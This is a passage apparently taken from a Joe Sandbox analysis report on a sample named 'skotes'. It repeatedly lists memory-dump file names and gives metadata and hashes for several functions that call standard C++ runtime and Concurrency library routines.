Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 87fd99b1bc44c226aeab8849fbeecabd19803d24aef5e1f9716d196569891f3e
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: FE313630F08255ABCF1EAB7844927FE77B59F41300F0442A9D4A5D72C2DB256E0AD791

Function 00C14840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C14877
___except_validate_context_record.LIBVCRUNTIME ref: 00C1487F
_ValidateLocalCookies.LIBCMT ref: 00C14908
__IsNonwritableInCurrentImage.LIBCMT ref: 00C14933
_ValidateLocalCookies.LIBCMT ref: 00C14988

Strings

csm, xrefs: 00C1491D

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2f7695034e0f2b5905af6659e0355154fab81ac4d2846a8a31244d173df68781
Instruction ID: e9ed71dd1590813e61a0a762d17aae6a1c4b4ef5a7410c8c2741df9adaa2db07
Opcode Fuzzy Hash: 2f7695034e0f2b5905af6659e0355154fab81ac4d2846a8a31244d173df68781
Instruction Fuzzy Hash: 7041E634A00208DFCF14DF68D885ADE7BB8BF46324F148155F8249B392C731DA96EB91

Function 00C0DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00C0DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00C0DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00C0DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00C0DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00C0DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00C0DE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00C0DE74

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: f70daf509a1a602181f8660190030b16e4ebe0724a9e96a05488c765c8b74374
Instruction ID: 47bf4afa48ae5a96a10ef1d74c660ffde73730ac3ae4972a6fc5a720a108ba7e
Opcode Fuzzy Hash: f70daf509a1a602181f8660190030b16e4ebe0724a9e96a05488c765c8b74374
Instruction Fuzzy Hash: 0D41AC30A043489BDF18FBE4C4557FD7BA5AF11304F1444A9E9626B2C3DB758E08DB62

Function 00C0E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00C0E7D7

Part of subcall function 00C0E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00C0E577
Part of subcall function 00C0E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00C0E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00C0E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00C0E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0E879
Concurrency::location::_Assign.LIBCMT ref: 00C0E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E8B5

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 5bc705dd75af0027a8d441f9f8829a22f66c6016895c10dca395cec8b5b02dd0
Instruction ID: 941eb9d87319e5ea1ae731c2b884b07d1aa566c9b667c4b7b2008fc3cf7fd4bf
Opcode Fuzzy Hash: 5bc705dd75af0027a8d441f9f8829a22f66c6016895c10dca395cec8b5b02dd0
Instruction Fuzzy Hash: A2411875A00208DFCF05EF68C495BADB7B5FF48310F1885A9DD599B382DB30AA41CB91

Function 00BF6E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00BF6ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00BF6F22
std::_Rethrow_future_exception.LIBCPMT ref: 00BF6F32
__Mtx_unlock.LIBCPMT ref: 00BF6FD5
__Mtx_unlock.LIBCPMT ref: 00BF70DB
__Mtx_unlock.LIBCPMT ref: 00BF7116

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 6442b5288234f578ec54a6ab694a269de0c53522c8a9b825224d6e1bb48c1b9c
Instruction ID: 31f0714f0f008eb383bfa7a9e1e6e4f799908af8f5fe490988691045851f412a
Opcode Fuzzy Hash: 6442b5288234f578ec54a6ab694a269de0c53522c8a9b825224d6e1bb48c1b9c
Instruction Fuzzy Hash: CCC1BE7190424D9BDB20DFB4C945BBABBF4EF05310F0045ADEA16A7691EB31AA4CCB61

Function 00C044DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00C04538
ListArray.LIBCONCRT ref: 00C0456C
Hash.LIBCMT ref: 00C045D5
Hash.LIBCMT ref: 00C045E5

